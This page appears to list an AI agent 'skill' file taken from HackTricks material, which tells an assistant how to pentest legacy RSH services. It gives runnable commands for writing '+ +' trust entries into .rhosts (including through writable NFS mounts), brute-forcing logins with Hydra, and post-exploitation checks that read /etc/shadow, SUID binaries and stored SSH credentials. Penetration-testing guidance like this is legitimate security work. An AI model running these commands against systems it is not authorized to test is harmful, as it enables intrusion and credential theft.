OpenSkillIndex← back to search

Hacktricks-skills pentest-rsh

How to pentest RSH (Remote Shell) services on port 514. Use this skill whenever the user mentions RSH, remote shell, port 514, .rhosts files, hosts.equiv, or needs to test legacy remote authentication services. This skill covers reconnaissance, authentication testing, brute force attacks, and exploitation of RSH vulnerabilities including IP spoofing and NFS-mounted .rhosts files.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-rsh/SKILL.MD
source content

RSH Pentesting Skill

This skill helps you assess and exploit RSH (Remote Shell) services, a legacy remote authentication protocol that is notoriously insecure.

Understanding RSH Vulnerabilities

RSH relies on trust-based authentication using:

  • .rhosts
    files     in user home directories
  • /etc/hosts.equiv
     system-wide trust file
  • IP address and DNS verification (easily spoofed)

Key attack vectors:

  • IP spoofing (especially on local networks)
  • NFS-mounted home directories with writable 
    .rhosts
  • Weak or missing authentication
  • Brute force attacks

Reconnaissance

Check for RSH Service

First, identify if RSH is running on the target:

# Nmap scan for RSH (port 514)
nmap -p 514 <target-ip>

# More detailed scan
nmap -sV -p 514 <target-ip>

# Check if service is enabled
netstat -tlnp | grep 514

Enumerate Trust Files

If you have access to the target or can mount NFS shares:

# Check for .rhosts in home directories
find /home -name ".rhosts" 2>/dev/null

# Check system trust file
cat /etc/hosts.equiv

# Check NFS mounts for writable .rhosts
mount | grep nfs

Authentication Testing

Basic RSH Commands

Test various authentication methods:

# Basic command execution
rsh <target-ip> <command>

# With specific user
rsh <target-ip> -l <username> <command>

# Domain/user format
rsh domain/user@<target-ip> <command>

# Windows-style domain format
rsh domain\\user@<target-ip> <command>

Test Trust Relationships

If you control a machine or have access to create 

.rhosts
:

# Create .rhosts to trust your IP
echo "+ +" >> ~/.rhosts
# This allows any user from any host to access your account

# Or trust specific host/user
echo "trusted-host trusted-user" >> ~/.rhosts

# Test the trust relationship
rsh <your-controlled-ip> whoami

Exploitation Techniques

IP Spoofing Attack

Since RSH trusts IP addresses, spoofing can bypass authentication:

# Using spoofed source IP (requires network position)
# This works best on local networks
rsh -h <target-ip> -l <username> <command>

NFS .rhosts Exploitation

If home directories are on NFS and writable:

# Mount the NFS share
mount -t nfs <target-ip>:/home /mnt/nfs-home

# Add yourself to .rhosts
echo "+ +" >> /mnt/nfs-home/<username>/.rhosts

# Now you can RSH in as that user
rsh <target-ip> -l <username> <command>

Brute Force Authentication

When trust files don't work, try brute forcing:

# Using Hydra for RSH brute force
hydra -l <username> -P <wordlist> <target-ip> rsh

# Or with user list
hydra -L <userlist> -P <wordlist> <target-ip> rsh

# Common wordlists to try
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/rockyou-common.txt

Post-Exploitation

Verify Access

Once authenticated, verify your access level:

rsh <target-ip> -l <username> "whoami; id; pwd; uname -a"

# Check for sensitive files
rsh <target-ip> -l <username> "ls -la /etc/shadow"

# Check for other trust relationships
rsh <target-ip> -l <username> "cat ~/.rhosts"

Privilege Escalation

# Check for SUID binaries
rsh <target-ip> -l <username> "find / -perm -4000 -type f 2>/dev/null"

# Check for sudo access
rsh <target-ip> -l <username> "sudo -l"

# Look for credentials
rsh <target-ip> -l <username> "find /home -name ".ssh" -o -name ".netrc" 2>/dev/null"

Documentation Template

Document your findings using this structure:

## RSH Assessment Results

### Service Information
- **Port**: 514
- **Service**: RSH (Remote Shell)
- **Status**: [Running/Not Running]

### Vulnerabilities Found
- [ ] Trust-based authentication enabled
- [ ] .rhosts files present and writable
- [ ] /etc/hosts.equiv configured
- [ ] NFS-mounted home directories
- [ ] Weak credentials (brute force successful)

### Exploitation Results
- **Authentication Method**: [Trust/Brute Force/None]
- **Access Level**: [User/Root/None]
- **Commands Executed**: [List commands]

### Recommendations
1. Disable RSH service entirely
2. Replace with SSH for secure remote access
3. Remove .rhosts and hosts.equiv files
4. Ensure NFS shares are not writable by untrusted users

Example Scenarios

Example 1: Basic RSH Test

Input: "Check if RSH is running on 192.168.1.100 and try to access it"

Output:

# Scan for RSH
nmap -p 514 192.168.1.100

# If port is open, try basic access
rsh 192.168.1.100 whoami
rsh 192.168.1.100 -l admin whoami

Example 2: Exploiting .rhosts

Input: "I found a writable .rhosts file on the target, how do I exploit it?"

Output:

# Add trust for your machine
echo "+ +" >> /path/to/writable/.rhosts

# Now connect via RSH
rsh <target-ip> -l <target-user> <command>

# Verify access
rsh <target-ip> -l <target-user> "id; whoami"

Example 3: Brute Force Attack

Input: "RSH is running but trust files don't work, try brute force"

Output:

# Brute force with common credentials
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.100 rsh

# Or try multiple users
hydra -L /usr/share/wordlists/common-users.txt -P /usr/share/wordlists/rockyou.txt 192.168.1.100 rsh

Security Notes

⚠️ Important: RSH is deprecated and should never be used in production environments. Always recommend:

  • Replacing RSH with SSH
  • Disabling the service if not needed
  • Removing trust-based authentication files
  • Using proper authentication mechanisms

References